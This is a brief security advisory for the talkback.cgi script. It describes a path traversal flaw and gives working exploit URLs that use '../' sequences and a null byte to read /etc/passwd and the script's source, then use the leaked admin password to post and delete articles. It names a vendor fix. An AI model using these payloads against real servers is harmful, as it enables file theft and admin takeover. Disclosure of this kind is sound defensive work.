Vulnerability

    talkback.cgi

Affected

    talkback.cgi

Description

    Stan  a.k.a.  ThePike  found  following.   Talkback.cgi  may allow
    remote users (website  visitors) to view  any file on  a webserver
    (depending on the user the webserver is running on).

        http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1

    This  will  display  the  /etc/passwd  (if  the webserver user has
    access  to  this  file).   Another  URL  can display the source of
    talkback.cgi itself that contains the admin password:

        http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1

    You   might    have    to   use    another    URL   instead     of
    ../cgi-bin/talkback.cgi%00, this depends  on where the  cgi-bin is
    installed.  In this file you can find $admin_password that can  be
    used in

        http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

    to post & delete articles.

Solution

    Way To  The Web  has released  an updated  version of talkback.cgi
    that isn't vulnerable to this problem:

        http://www.waytotheweb.com/webscripts/talkback.htm